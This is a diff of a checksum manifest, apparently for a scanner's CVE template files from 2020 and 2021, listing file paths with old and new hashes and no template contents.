+http/cves/2020/CVE-2020-6950.yaml:a2f005a3cbbbf98b511f7581f8ba88e5401510aa +http/cves/2020/CVE-2020-7107.yaml:cc6dc47b28f17c25e1619ab5a3edbb4bfed3e8f3 +http/cves/2020/CVE-2020-7136.yaml:6e732e958094e4ad30bb994e7602c0cb2e04a1ca http/cves/2020/CVE-2020-7209.yaml:0f6026d48cd89d6faa187af05d42c9518f7a48ae -http/cves/2020/CVE-2020-7318.yaml:0ee84af039d5d27f45bc0ce4a628b2550a80fd8e -http/cves/2020/CVE-2020-7796.yaml:f4b073f23fbc79d82d2d3701ea96ec2904587faa -http/cves/2020/CVE-2020-7943.yaml:7c1a1baf25d423ad09a63cd8e4c6930d58ed9626 -http/cves/2020/CVE-2020-7961.yaml:63a1bbbdf1b6a0a9e831502b6f6cadf992fc043e -http/cves/2020/CVE-2020-7980.yaml:becc3ce799e1d9d704840752e31c1b38ac0f651b -http/cves/2020/CVE-2020-8115.yaml:5783f92b5ccedceb0c259e03cca80fd47053a915 -http/cves/2020/CVE-2020-8163.yaml:f470d2d3016a962f7ec590d77b19a43f6acadb88 -http/cves/2020/CVE-2020-8191.yaml:6ed1e734ec2ee564f2b11700bc59380222121485 -http/cves/2020/CVE-2020-8193.yaml:c730b189267de57e03a336d73fda9c22c435b30e +http/cves/2020/CVE-2020-7318.yaml:4103c3864c23d3d6051a46a353c0a26f999c315d +http/cves/2020/CVE-2020-7796.yaml:2edde786f2b68cd2a253c24665496d6a985442fe +http/cves/2020/CVE-2020-7943.yaml:8afe020a36b1eb69a2b2eb06c08f9f4cd0ca5ff2 +http/cves/2020/CVE-2020-7961.yaml:f7fba861921ab2e2a62af998de3cba8f5c270cc9 +http/cves/2020/CVE-2020-7980.yaml:6d32d0a0cbe584e4adb0d9e0638aa5c4e62f3ee3 +http/cves/2020/CVE-2020-8115.yaml:a04ebc2299d633d847a169d0b9c73e883cda8f80 +http/cves/2020/CVE-2020-8163.yaml:1d8b50738e8aa4b505e6dda88b20fa7716de3ee5 +http/cves/2020/CVE-2020-8191.yaml:eb7ce1550e3c02349142058d5a0b9a713e810915 +http/cves/2020/CVE-2020-8193.yaml:4284d6d0a6afaa9469244d30d5ff29ff306d8ce6 http/cves/2020/CVE-2020-8194.yaml:1799ec8f9624c47809dedd73f5a2d22aaa20f638 http/cves/2020/CVE-2020-8209.yaml:d5a138aa97863d4074fe218b3049f7791fb81ab9 -http/cves/2020/CVE-2020-8497.yaml:cdb905b1cb4a6db55e8a6da868be8a91f09d33d6 -http/cves/2020/CVE-2020-8512.yaml:4a6489520aee40a14b3f2c70b30a28b209ee05d1 -http/cves/2020/CVE-2020-8515.yaml:60a9f0e5cf482b2abf522834d95875baf33f29ac -http/cves/2020/CVE-2020-8615.yaml:f4732edfed404f9be43debf22e295605eab2e532 -http/cves/2020/CVE-2020-8641.yaml:8d361c6ac6ea6a97bc24fbe5a8e69df0cf5ff73a -http/cves/2020/CVE-2020-8644.yaml:08ca5cfa9de25d11eff7521ad38f5279e686c141 +http/cves/2020/CVE-2020-8497.yaml:f1ae2ea882ecfe74d992711a94a9ab226dc34f2f +http/cves/2020/CVE-2020-8512.yaml:41b042b9085849f68752fdf0bbef458fb6e4c81b +http/cves/2020/CVE-2020-8515.yaml:9047b8393f7d8cc847713268690b7155b6508643 +http/cves/2020/CVE-2020-8615.yaml:28215d7bef64c613817859ffecc684925f025a6f +http/cves/2020/CVE-2020-8641.yaml:b734674ab43e3bbdc7c4396851f425c9721f8362 +http/cves/2020/CVE-2020-8644.yaml:442e833ef76b787a02a056b9de094015e0c57618 http/cves/2020/CVE-2020-8654.yaml:86969023c0fb1d0f7e502880eb4ead28b3b5cd5d http/cves/2020/CVE-2020-8771.yaml:fdbf80c1219ed77aa813cdea75224fc0e0437e11 -http/cves/2020/CVE-2020-8772.yaml:b6fec3222c262217a8cf5bba125b4298ebe5c279 -http/cves/2020/CVE-2020-8813.yaml:9eb88a961a0eacb2e81e33e6cf79ac190a2bf1f6 -http/cves/2020/CVE-2020-8982.yaml:01d3456ee84b4be1c04f9a48fdf3e521ea32ba80 -http/cves/2020/CVE-2020-9036.yaml:8f1109d1da947a0ad8562a105d79c5933d0db5cb +http/cves/2020/CVE-2020-8772.yaml:1c497ecdec6a48ebef0e1aef3571270c98b119d4 +http/cves/2020/CVE-2020-8813.yaml:a138cc708be6db87262901be29a348f42b8d0f2c +http/cves/2020/CVE-2020-8982.yaml:2609994079bdeb1e72ba61248516e1d95f6258a6 +http/cves/2020/CVE-2020-9036.yaml:c406a983523f91b2ef6adbec171216597d3e81bb http/cves/2020/CVE-2020-9043.yaml:849faa887c73b1638d4f68a403a21a320989a062 http/cves/2020/CVE-2020-9047.yaml:ef83a27c2edd3c2776b89c8bfdaec91d6e1ace59 http/cves/2020/CVE-2020-9054.yaml:c9e18ac60edbecec09d912db77f833b45b70ed7c -http/cves/2020/CVE-2020-9315.yaml:1900cca1d2d418d09656c586bc4718699fa72a12 -http/cves/2020/CVE-2020-9344.yaml:a89bced51c825a39641d826e6de466e04cedb222 -http/cves/2020/CVE-2020-9376.yaml:9136255705fdee1fea7913b09adaeb0cdfd83458 -http/cves/2020/CVE-2020-9402.yaml:398e68e2cbce9d105785e1d3cbd98056162eb439 -http/cves/2020/CVE-2020-9425.yaml:49b1c59803a7cc4378e6bfa690f375ad95855d10 +http/cves/2020/CVE-2020-9315.yaml:9c617983c07752889978bb310592e80738e185ec +http/cves/2020/CVE-2020-9344.yaml:7fdb85e16b94071d81a6cabe66028feddd357808 +http/cves/2020/CVE-2020-9376.yaml:4ecda617567ce3ec2f2afd357739dd21f516b259 +http/cves/2020/CVE-2020-9402.yaml:f03bf05b0f3b933accef4dcd7168f9129eadcfe2 +http/cves/2020/CVE-2020-9425.yaml:a917fe2704478f54404b4a5a410ea249350516d1 http/cves/2020/CVE-2020-9483.yaml:b856b57a3c83f86b77fe655826d69410a2cff66c -http/cves/2020/CVE-2020-9484.yaml:a5952e10d76346826ec105f1e756ac44c270ee63 -http/cves/2020/CVE-2020-9496.yaml:85cf814c38c7240d6138f8f2969931e1c21589cc -http/cves/2020/CVE-2020-9757.yaml:1e71acf8ed2a354d230ed4b9f2c4683ce6a6a0cb -http/cves/2021/CVE-2021-1472.yaml:9fc6a2d166c5f4420df34e0797fe64cb79ce5ecd +http/cves/2020/CVE-2020-9484.yaml:1bf9ce4062ff0408e685129bb5903a20cb049cd9 +http/cves/2020/CVE-2020-9496.yaml:5d9976de5e0d435c44785ef10bd66ae8345c2fd1 +http/cves/2020/CVE-2020-9757.yaml:7b655f574386f646becd09992d9762d3d1323c19 +http/cves/2021/CVE-2021-1472.yaml:9667efe3cd6c38e1cca9cfbf5b6bdd476230fac6 http/cves/2021/CVE-2021-1497.yaml:8e4e8691b05b2e3003f544dba1dd82e9d0469977 -http/cves/2021/CVE-2021-1498.yaml:f77f639b7bd67b05d7e4aae346e07a35bb1515bd -http/cves/2021/CVE-2021-1499.yaml:4cfb5a4971a96a3ea7449540cd2a674f8c416f3b -http/cves/2021/CVE-2021-20031.yaml:2a1693e374980b54e233b120122f40613907a67b +http/cves/2021/CVE-2021-1498.yaml:34f12d383bcd66e9c0b8abdb32af5eee246f0672 +http/cves/2021/CVE-2021-1499.yaml:0d707d87542b57952d40f7c04fb7e9f3d049eddd +http/cves/2021/CVE-2021-20031.yaml:8f171b51f07e049e29e708aba398ac1a5e9e0103 http/cves/2021/CVE-2021-20038.yaml:7167a6c38c9fde66a10e0146a4d0d470fa64c37f http/cves/2021/CVE-2021-20090.yaml:492bf1d4e71155f00ea4caff43a2ed3bd18991cf -http/cves/2021/CVE-2021-20091.yaml:1da951bf5a65bfe6f2a7704de42df7a91bd73b3c +http/cves/2021/CVE-2021-20091.yaml:19f8133469d473c2292a69989c39c54a0cf87ed7 http/cves/2021/CVE-2021-20092.yaml:cafad84bd12f41f09da4a823b1b68585a5e63051 -http/cves/2021/CVE-2021-20114.yaml:aefc50a43542667e567e801325efdfb7160044ad -http/cves/2021/CVE-2021-20123.yaml:c518f9a5a37e85cfe1c46b32ca52e73c0692747b -http/cves/2021/CVE-2021-20124.yaml:abb973e39dd6f5dce5d12dcc4ad33f22e689a4e1 -http/cves/2021/CVE-2021-20137.yaml:0daaa379a978d0428366623ff2aef851212c9f21 -http/cves/2021/CVE-2021-20150.yaml:075cd5dda8786ace5a3df71e55bdf025602c91da -http/cves/2021/CVE-2021-20158.yaml:e7060d25815d287630f615da2bc2bc16797cf003 -http/cves/2021/CVE-2021-20167.yaml:18e9d41d4ccf3a94d4037bd1b023ee8b13a38f7e -http/cves/2021/CVE-2021-20323.yaml:00fb4bd0630e78aa9c940d8eca1feae7081f925f -http/cves/2021/CVE-2021-20792.yaml:35ff7b8aad2ef0641a3118a0ac5943a40b7ce110 -http/cves/2021/CVE-2021-20837.yaml:5779476dc1adc4d80f2ebcc5c85323117c40f6a4 -http/cves/2021/CVE-2021-21087.yaml:b4a4f6e73ea548e793410fa0833fa9ddddbb2271 -http/cves/2021/CVE-2021-21234.yaml:3bebd96604bdc88a51c32a98c2b2bb9ecba0966a -http/cves/2021/CVE-2021-21287.yaml:55c45e7817d18159e21800f1e1794f26c86cdd3d -http/cves/2021/CVE-2021-21307.yaml:a058a2356df9e6607e9f8ae975812945caee9873 -http/cves/2021/CVE-2021-21311.yaml:0154798d24b10664dd98db0008b371a50f227d61 +http/cves/2021/CVE-2021-20114.yaml:36093947ca866a4627465d891f407337217f0806 +http/cves/2021/CVE-2021-20123.yaml:1827d563dfc7b91e266b8b1ddf901112f3926f78 +http/cves/2021/CVE-2021-20124.yaml:34e9e9a9175ea652c68cdf3046908f65db32b0c8 +http/cves/2021/CVE-2021-20137.yaml:ed26c4e766913416b746ce9120b823ac448731cb +http/cves/2021/CVE-2021-20150.yaml:7d165f05c8b0f913cf3a1088fc09bdbfc512503b +http/cves/2021/CVE-2021-20158.yaml:c648d25a1b384eaf49914ab6d128a647c7a8cc2f +http/cves/2021/CVE-2021-20167.yaml:36cc773bc72b6055133b65b2763ecd8bb5add28e +http/cves/2021/CVE-2021-20323.yaml:538208e51e77f582d55331ace479638d0655f3f0 +http/cves/2021/CVE-2021-20792.yaml:cd40a8ba02194765b10b24575346a4b375a4ad08 +http/cves/2021/CVE-2021-20837.yaml:85abbae82e8aa373f59622ed90dbf31a8e621de3 +http/cves/2021/CVE-2021-21087.yaml:574a986e6e401cc9348bc151d16178705b0baf8e +http/cves/2021/CVE-2021-21234.yaml:1de458d38a523fa3fa8fdb6e08aa4c53f341ce13 +http/cves/2021/CVE-2021-21287.yaml:9df66b2faeda2a1fb17e0492b028f737db95fc7c +http/cves/2021/CVE-2021-21307.yaml:17e50a4be7be781682f5a2a575ea36ecf9d751a1 +http/cves/2021/CVE-2021-21311.yaml:3c4d566dd7839f49e4166877280a90a0ae6e21f2 http/cves/2021/CVE-2021-21315.yaml:70406f1f801ca874413f322d2961c79a8754fb7f http/cves/2021/CVE-2021-21345.yaml:512607ead259d98de98ba7711800d5198a0aa819 -http/cves/2021/CVE-2021-21351.yaml:8e68e655d6102eb88dd246bfb3561d50ebf1eafd -http/cves/2021/CVE-2021-21389.yaml:a0f10bdb842da5078c37a9afacd6a602c0732546 -http/cves/2021/CVE-2021-21402.yaml:e64c2bf5425996ff22209077460cc2413d15aa9d +http/cves/2021/CVE-2021-21351.yaml:a9ff2618269205226e66ebb73a3b38b61c5c9007 +http/cves/2021/CVE-2021-21389.yaml:7a7bf10e2505418f11e6cc1759c83079f3b22e32 +http/cves/2021/CVE-2021-21402.yaml:c52caaadc4b083d16b32313b3a4582bd41fbaf98 http/cves/2021/CVE-2021-21479.yaml:6576b05e5abc8d3992d561c5217251883e27d8ca -http/cves/2021/CVE-2021-21745.yaml:da13fdae366d46db22003811aea9e87376765b7f -http/cves/2021/CVE-2021-21799.yaml:0fe83549d591a70959d82ae6cd8e487286176d5a -http/cves/2021/CVE-2021-21800.yaml:14ccc1c341b59710236dfafec5ff26f606a95d84 -http/cves/2021/CVE-2021-21801.yaml:940ff78b6102645d3a0f528bb0521b958e225031 -http/cves/2021/CVE-2021-21802.yaml:b858969ae45c1ae53fbbf227e63415f6b6b1a06e -http/cves/2021/CVE-2021-21803.yaml:2ef3cf3a7031fe7de22e837cec7fab43ddd43fca -http/cves/2021/CVE-2021-21805.yaml:eb1766b4e6c62d3ff6829821a5e944d1bb21babc +http/cves/2021/CVE-2021-21745.yaml:6222c9d2c8645ffaa32de1c39028a28bcd183082 +http/cves/2021/CVE-2021-21799.yaml:2f171a650be13baf18cfbd8a4c8b5e961827aa40 +http/cves/2021/CVE-2021-21800.yaml:1638be9a18b94b9eb05132143635b4668ff605c8 +http/cves/2021/CVE-2021-21801.yaml:c6c41e47254da5e398bb75f06d9f4c3400ca01a0 +http/cves/2021/CVE-2021-21802.yaml:c13ebeb4d41efc30f7e13bb5c0f1b4b1b469b79f +http/cves/2021/CVE-2021-21803.yaml:84f1528add8b6ffdf91ca8ef5227452f6a37cd77 +http/cves/2021/CVE-2021-21805.yaml:318c8cad7f9b3d3464160f435c5dda2a0b85867e http/cves/2021/CVE-2021-21816.yaml:520bc9b9b2480f3d3745af02a4a646d3cc95a1bb http/cves/2021/CVE-2021-21881.yaml:314c6a82741362db622de79002bdaaa699d77761 http/cves/2021/CVE-2021-21972.yaml:3cb1d3e5a750dee527ad05a5dde9606adf3534da http/cves/2021/CVE-2021-21973.yaml:853e9759bf3850a3c10bf2d32c0817837c5a9296 http/cves/2021/CVE-2021-21975.yaml:7f5af74dfddf9aad00a337757a5d13c48d2e32a5 -http/cves/2021/CVE-2021-21978.yaml:a4ca0080ca54e4fb2dd60df5a9b22016d5dc35c9 +http/cves/2021/CVE-2021-21978.yaml:8aabff2e16d6c1a606f7a8131f8c9c4156885355 http/cves/2021/CVE-2021-21985.yaml:de275a6d1f73b71650461305255ce4033fb0f6c3 -http/cves/2021/CVE-2021-22005.yaml:fe325a40c57f48bb4882a1fd996574deeb165879 -http/cves/2021/CVE-2021-22053.yaml:d8208a8a3043a154e1a4fe7f8509addc209f8875 -http/cves/2021/CVE-2021-22054.yaml:c1b2c935bc6b3a81302c81bfa50c0f6223aa1b1f -http/cves/2021/CVE-2021-22122.yaml:07ca11d8042ad99ed5aa7c541c736b1402fd7a5d -http/cves/2021/CVE-2021-22145.yaml:b4f6a6a818fbd74362c332552aabcf5bad37a688 -http/cves/2021/CVE-2021-22205.yaml:3bc9cd57d614ef6a973445c42055cf5697201c94 -http/cves/2021/CVE-2021-22214.yaml:7064fb2447f553a11ac940d7873755f0a31d2bcd +http/cves/2021/CVE-2021-22005.yaml:5b561670c55077e8de9fd19c0beb7e5fdb803f4a +http/cves/2021/CVE-2021-22053.yaml:fbe006fbc8394b6eacee6ad237dd73da0fb449c4 +http/cves/2021/CVE-2021-22054.yaml:c2de346923e112220a96eef52ac3ce54cea959e2 +http/cves/2021/CVE-2021-22122.yaml:afd75a3aea95f2f896b818a8951db13d1553d6dd +http/cves/2021/CVE-2021-22145.yaml:50c53aa0ad8179ca5c6a3ceca5ee45f75fc39edb +http/cves/2021/CVE-2021-22205.yaml:295d8f8b8991463618ae9b0649beee9bf60ce891 +http/cves/2021/CVE-2021-22214.yaml:9be0feb3e7d8d70731697b55e60e03991b023bee http/cves/2021/CVE-2021-22502.yaml:0222d90f5cb9381a29406ba64373c7a401ddaf0f -http/cves/2021/CVE-2021-22707.yaml:5f16e2f4524a176ad6521e6b3d80e5533447c44d -http/cves/2021/CVE-2021-22873.yaml:88b0b5dd1d60b31f5bb752d3931fd07e8bdf72c3 -http/cves/2021/CVE-2021-22911.yaml:6de8d0845adb4ef46c6447a4326a35cc946dd823 -http/cves/2021/CVE-2021-22986.yaml:31f5e400fc950bc34cf66eca3460919816e6f71c +http/cves/2021/CVE-2021-22707.yaml:285a3fb865a0f34788b7c98c5d0b0499fff4324b +http/cves/2021/CVE-2021-22873.yaml:37afc9d05370d6c092d337a0f241485d7780401e +http/cves/2021/CVE-2021-22911.yaml:8f4b010e1332d5eb900a0baa745f9364f8f56b31 +http/cves/2021/CVE-2021-22986.yaml:1076ec3050b272555fa680391c910a752b03e68a http/cves/2021/CVE-2021-23241.yaml:e1888868bf2770805a3f0cb3cae6820883bf9754 -http/cves/2021/CVE-2021-24145.yaml:e6e82aec5f5af7635fb64950a94cc6b5ede67c28 +http/cves/2021/CVE-2021-24145.yaml:354af1a704e593bb9efc889f47ce82d30177f92f http/cves/2021/CVE-2021-24146.yaml:30f30afaad0e48ad7394e8f3bc658e3c52ea375d http/cves/2021/CVE-2021-24150.yaml:bc46ae35079f405b539824e978457a5726b272ed http/cves/2021/CVE-2021-24155.yaml:fc725c5de1693bf4594d37b2b83d936127f2ff94 -http/cves/2021/CVE-2021-24165.yaml:cf99607da08b31da4b450f3c79ab66d2a78f4270 -http/cves/2021/CVE-2021-24169.yaml:6ab7986da54e496ed7901604980a6b62e95d0540 +http/cves/2021/CVE-2021-24165.yaml:27cba6c56a98cbdc748f6814224c197878411fc3 +http/cves/2021/CVE-2021-24169.yaml:c21c1c72a9513ec661cf3d6c7934301e52d2940d http/cves/2021/CVE-2021-24176.yaml:08064c398c90c5743dcd737492b44532ad8ae609 http/cves/2021/CVE-2021-24210.yaml:f3c92e19e3e4ecb701c23031ba681bc0bebbed93 -http/cves/2021/CVE-2021-24214.yaml:373a596e522804f9a9997fff30ef0f2acf94cc66 -http/cves/2021/CVE-2021-24215.yaml:37ab6917498b5938e472925d78a9ffc51df8ef4b +http/cves/2021/CVE-2021-24214.yaml:d6c9b3efb19f79dfa006ddc0776948c0b0456ba4 +http/cves/2021/CVE-2021-24215.yaml:a3f345d9b35b7e5ffb2bac0cf3d59a9e1a53b03a http/cves/2021/CVE-2021-24226.yaml:e3cce68f878058a5b883337446b715c4638ea5b2 -http/cves/2021/CVE-2021-24227.yaml:9a69a16794dbe8c405cb180f644fdfc4905907e1 -http/cves/2021/CVE-2021-24235.yaml:3cebd4f0ff47c09aa044f04f2a2a5556a270c627 +http/cves/2021/CVE-2021-24227.yaml:8fc4d2d5ed2eb9d6cfe65a19a96d237f7ffab7c5 +http/cves/2021/CVE-2021-24235.yaml:b292ae465be4b68e60b77f72a57ccc8563ebf31b http/cves/2021/CVE-2021-24236.yaml:b23f084964832d51ab3f4af593232ecdde5e6586 -http/cves/2021/CVE-2021-24237.yaml:3b933f6017ed933c7dd0e2bdb009e8a4380007fc -http/cves/2021/CVE-2021-24239.yaml:8675928c6b117809c4be9f080f0e3b90d3805e31 +http/cves/2021/CVE-2021-24237.yaml:0d3ee3780923885ddc6cffc545df05ff9b5004bd +http/cves/2021/CVE-2021-24239.yaml:a8d97d308ddfbcf213d28485265edcaca9429149 http/cves/2021/CVE-2021-24245.yaml:7bb1fc8f1f066614f4acc1287336318999c2b9ab http/cves/2021/CVE-2021-24274.yaml:fdc8b3c848faeec90768ba04b9afd444ada6ed29 -http/cves/2021/CVE-2021-24275.yaml:a1a605d2709c989d4b282a55c7b6420cb93f6f41 -http/cves/2021/CVE-2021-24276.yaml:14ab150dfbb0d9e69f444b87617e45e5d7c85fba -http/cves/2021/CVE-2021-24278.yaml:d0911c2e74a071f6ed35ec02836ae6f952343772 +http/cves/2021/CVE-2021-24275.yaml:699ee68f24f9120d66a588ba7d98403ae1bec79f +http/cves/2021/CVE-2021-24276.yaml:6d529d93b95d236e4d67e627f628dfc100a385d2 +http/cves/2021/CVE-2021-24278.yaml:0b2dc1146c6f6e6e271dc39b3f043f9c68eb69a4 http/cves/2021/CVE-2021-24284.yaml:8e0a2d867fefe5278478906204c54407d2c52981 -http/cves/2021/CVE-2021-24285.yaml:c25f3c43e4dacddb0dbec3562d7a32f46f09a59c -http/cves/2021/CVE-2021-24286.yaml:28e87a794c7aed34e30970461c7d6f4d5f9ca3cc -http/cves/2021/CVE-2021-24287.yaml:116274ad6f0c3249da6aed5bcf9662462615b117 -http/cves/2021/CVE-2021-24288.yaml:fb8bb41722f495b69d91278ed06ea186c2aa2fb4 -http/cves/2021/CVE-2021-24291.yaml:dad4f96eb0c16f1545431c9df93842305f26a1ae +http/cves/2021/CVE-2021-24285.yaml:92ccc610fac04483e22bf7475143c25140218d39 +http/cves/2021/CVE-2021-24286.yaml:4fc77bc8752808ae5219d482ff86de500e673399 +http/cves/2021/CVE-2021-24287.yaml:301c22e8fc62be986b55d8c632c971ada3634f04 +http/cves/2021/CVE-2021-24288.yaml:906f67ef2610bde07a1372beec43f666d94e7646 +http/cves/2021/CVE-2021-24291.yaml:989514beb32327a90f746f0b5a5cc7d37ab875ca http/cves/2021/CVE-2021-24298.yaml:ed0a99a0ae34549d1ba0cc1d1fc655a059ed6085 http/cves/2021/CVE-2021-24300.yaml:4e5f08f42588d8fc55a23ae949d761e9e9297f12 -http/cves/2021/CVE-2021-24316.yaml:e878005065bf4b6e222377ee880aef14d3342ebb -http/cves/2021/CVE-2021-24320.yaml:064d8840bd23e0bd74eee232616d5b3395229aef +http/cves/2021/CVE-2021-24316.yaml:4f664d0815cacf39455233fb049ba50fdab01c16 +http/cves/2021/CVE-2021-24320.yaml:bc1eb935a0f20a1d22bc2a6a0c120bfb9aca7f4b http/cves/2021/CVE-2021-24335.yaml:7e6548d5b8fd76c6cf9ebb4af47dd7f563999e1a -http/cves/2021/CVE-2021-24340.yaml:56f924a33ea2e02a7da8c72d8a98eae01d8286dd +http/cves/2021/CVE-2021-24340.yaml:45660d1227d8734c582cb7b1b79671940f80f45c http/cves/2021/CVE-2021-24342.yaml:45cf70e75e4e37166296cc7d2db4eee6b266a111 -http/cves/2021/CVE-2021-24347.yaml:a7b198fb418307f63ca9acf33e682de27d972f5f -http/cves/2021/CVE-2021-24351.yaml:5c8ef0e8c6bc5f6b7d9af51dcb39649fe73c975a -http/cves/2021/CVE-2021-24358.yaml:16d1d4314449c6b068c33c2130e3fcb0db7f165c +http/cves/2021/CVE-2021-24347.yaml:6c90d296d8416631ebaf7ece4b121eaf79c098e6 +http/cves/2021/CVE-2021-24351.yaml:10a1c630459cf99435e71b00505c5f64595ed030 +http/cves/2021/CVE-2021-24358.yaml:c7df8e26c19cfe2aa54d24d3fa8455d52b1698a1 http/cves/2021/CVE-2021-24364.yaml:462271144765c14ca8788b33496a643d7ff7dcf3 http/cves/2021/CVE-2021-24370.yaml:480c194476d40e71e0f58139dbac79cfcca559ba http/cves/2021/CVE-2021-24387.yaml:9d10f02a47e4a06f90f4f06a24f24e6177b962ec http/cves/2021/CVE-2021-24389.yaml:42ad59611f74158ae872570a997c48530f1b987f http/cves/2021/CVE-2021-24406.yaml:619168311788c421c9975c3b5285c06ade2c2dd7 http/cves/2021/CVE-2021-24407.yaml:1f40116c29a201347b75897f4ae36497de80c72a -http/cves/2021/CVE-2021-24409.yaml:2d79942f20f2565635b069191b9faf3ecc4e48ce -http/cves/2021/CVE-2021-24435.yaml:15387d29390d1ec6a1c5fb8f054dd823a10cef2f +http/cves/2021/CVE-2021-24409.yaml:d8e98773b4f78f847f8674f8fa150aa3d7534b1a +http/cves/2021/CVE-2021-24435.yaml:c2ec5e562bcc640a38deddebca4c7164b15f81bd http/cves/2021/CVE-2021-24436.yaml:602fa742a1830cb1f39707d935e978c4af32b0f6 -http/cves/2021/CVE-2021-24442.yaml:03047b68e4fab0c5aee20d5c8daeb94e7ec7045c +http/cves/2021/CVE-2021-24442.yaml:7e8e7ad39204adda8b6f027bd02c53354b19e5f5 http/cves/2021/CVE-2021-24452.yaml:83b001cad29a915b555b4ffc9e04f33a8e80637a -http/cves/2021/CVE-2021-24472.yaml:4dcca0eca6199a7b117013f82857bc7bd951533f +http/cves/2021/CVE-2021-24472.yaml:3c66ca8a367f6de92c875e08f5208b2c7680fddb http/cves/2021/CVE-2021-24488.yaml:f3a1efac3aee6f4c0a616e2c24eb9b422c05f159 -http/cves/2021/CVE-2021-24495.yaml:9776ce8d7642c38c752b5277411ae5ffd5d822f8 -http/cves/2021/CVE-2021-24498.yaml:e68e97cd91a0f778434094f485c1a13259df7149 +http/cves/2021/CVE-2021-24495.yaml:f4ecb1cb80b358b63faff083eccb92434ff2e6b9 +http/cves/2021/CVE-2021-24498.yaml:2dab1759f9177c9b511cc29caefbff8a3e30778f http/cves/2021/CVE-2021-24499.yaml:479ae56097144603aa0ac425b482797071c148a0 -http/cves/2021/CVE-2021-24510.yaml:ba66a091f2fa2c173e0cde1cbcb0c7e7e412f462 -http/cves/2021/CVE-2021-24554.yaml:3d14e85b29d926a1bfdd0408646468592755c2e4 -http/cves/2021/CVE-2021-24627.yaml:d08981841f2aadf45be7bfb2b624c740287bb846 -http/cves/2021/CVE-2021-24647.yaml:57e0c23fd8a53f4853ebd1bd8784bbd17ff174f1 +http/cves/2021/CVE-2021-24510.yaml:1e931f035d2345ecff4c534cfcef28fae8345c1d +http/cves/2021/CVE-2021-24554.yaml:e8341b35b6ad3ccd1b33edbffe1f61b464d6700d +http/cves/2021/CVE-2021-24627.yaml:57a1f4e2838721822caa3e97c15ad08a96ff52c0 +http/cves/2021/CVE-2021-24647.yaml:18c9d01f297fb0807334189d6e0c67dc881f6026 http/cves/2021/CVE-2021-24666.yaml:a25e0c97cdff1a1e807b28a99a00ef033722a6ac -http/cves/2021/CVE-2021-24731.yaml:3fb74c68ec27217782f13c9dcd2cbdcec90de59b -http/cves/2021/CVE-2021-24746.yaml:e817bdd5678f8a761303e95377fa9fd8c49bd351 -http/cves/2021/CVE-2021-24750.yaml:9a94ffcf36a259a6cd2de100ccdb877dd33b1619 +http/cves/2021/CVE-2021-24731.yaml:6d56d8b4ce11d8c5416a2dc8a8ec0557b507e515 +http/cves/2021/CVE-2021-24746.yaml:aaf375e2396c121de2a64543991c8850586bd8b4 +http/cves/2021/CVE-2021-24750.yaml:33880dabf05f52290bc3bdf6ef6a71dbccbe0005 http/cves/2021/CVE-2021-24762.yaml:33c2e8efc337a1f06768b1e6047d6a02c32e9e8a http/cves/2021/CVE-2021-24791.yaml:483a228643827bac8b87d83b78865d8f395bfd39 http/cves/2021/CVE-2021-24827.yaml:61c481595a7dabb304fd1c0cec9c7cd6a6a39684 -http/cves/2021/CVE-2021-24838.yaml:3e324388696bcd84d8cff8c5354abd28c3db3bcc -http/cves/2021/CVE-2021-24849.yaml:531bc837b67305d9b5488d191ab5bb1e88b9c8bd -http/cves/2021/CVE-2021-24862.yaml:18b88de1f2f004a26001bb93fc8072ec4f7a3372 -http/cves/2021/CVE-2021-24875.yaml:26b9421ad311a64c3696e1f27b6a87c2b2e64d8f -http/cves/2021/CVE-2021-24891.yaml:95ace65f00bc1b4f18f34b95b253c69f80192c35 +http/cves/2021/CVE-2021-24838.yaml:b0bc77f4126c393b78150ec6e3e6d3840c40a071 +http/cves/2021/CVE-2021-24849.yaml:bdfba047b022ac2a4e0168aae16ab6a5272c50de +http/cves/2021/CVE-2021-24862.yaml:78adc2493ed043de4466a990011b3bc4f7c88fe6 +http/cves/2021/CVE-2021-24875.yaml:78d31d54bfac674a34ecad0bbd7024aeb87c765c +http/cves/2021/CVE-2021-24891.yaml:664dffc5d4763e105b1438debac4ced927c4d6ae http/cves/2021/CVE-2021-24910.yaml:578aae9854f832a8e526a7a07c7d9b1557949de3 -http/cves/2021/CVE-2021-24915.yaml:8e2119bb3b35a4519c26947cf9e297ef976a134a -http/cves/2021/CVE-2021-24917.yaml:08f0ddeb207f275c090ca54b50434e696993b32b -http/cves/2021/CVE-2021-24926.yaml:ec83411f15a40fabfc7e893063d32fc7178a37dc +http/cves/2021/CVE-2021-24915.yaml:eb590415fa429797c7dc89516bc0261e38dc7f5b +http/cves/2021/CVE-2021-24917.yaml:c266a0fdaa11d4845b599de67c8a7943380fa539 +http/cves/2021/CVE-2021-24926.yaml:10bf105c8ef639ba7fc985d7954915b69c33c4b1 http/cves/2021/CVE-2021-24931.yaml:fee82426c5f1a5cbeb6c269ab91086e1026d14f6 -http/cves/2021/CVE-2021-24940.yaml:9b94c2a20503d658ae777df0cdf3168f25a936fb -http/cves/2021/CVE-2021-24943.yaml:798239f2034a244734927cb4c21f1511289eb724 -http/cves/2021/CVE-2021-24946.yaml:a1b408e926b8579f4ba65ae73a1ab85d6962bb2d -http/cves/2021/CVE-2021-24947.yaml:5d64893847435d3bf297bf280f24791f4cd58c51 +http/cves/2021/CVE-2021-24940.yaml:0481cbee1ce19ae7674a23128f0e1925164db6a7 +http/cves/2021/CVE-2021-24943.yaml:c8f138cd6d60951efb0adc150ed32d1daa789881 +http/cves/2021/CVE-2021-24946.yaml:5f09eec0c936dce40c7b346e73d3ab1e555b8026 +http/cves/2021/CVE-2021-24947.yaml:f91652cde78faaf0de5409ca19253ddd1ad4f11b http/cves/2021/CVE-2021-24956.yaml:3d8d0c0a4088c26ef4d5637c6e9f67b19539cb01 -http/cves/2021/CVE-2021-24970.yaml:43003e6dd3a06352c96df0c73482095e8e95a683 -http/cves/2021/CVE-2021-24979.yaml:b5cad9deea201ca00b277758a544a75b35d45db3 +http/cves/2021/CVE-2021-24970.yaml:fe2f26a13278d271e48a316d9826bf197e66d730 +http/cves/2021/CVE-2021-24979.yaml:7f132c8ef8c2fb055cdfd9265496a4ac0871f79f http/cves/2021/CVE-2021-24987.yaml:06ec87f0d9dad1a08870b903b897645a4114cca6 http/cves/2021/CVE-2021-24991.yaml:4bc4eec76c21b3f68454f49c72adff65d3a817b5 http/cves/2021/CVE-2021-24997.yaml:1824a3b9d5a403431c731e636e0365e882b2e145 -http/cves/2021/CVE-2021-25003.yaml:a8d3634ad0c75055bb3d751f846e3a586e54e7ad -http/cves/2021/CVE-2021-25008.yaml:08a6fdd6b7c3c743fc1b023df5905a53e90348eb 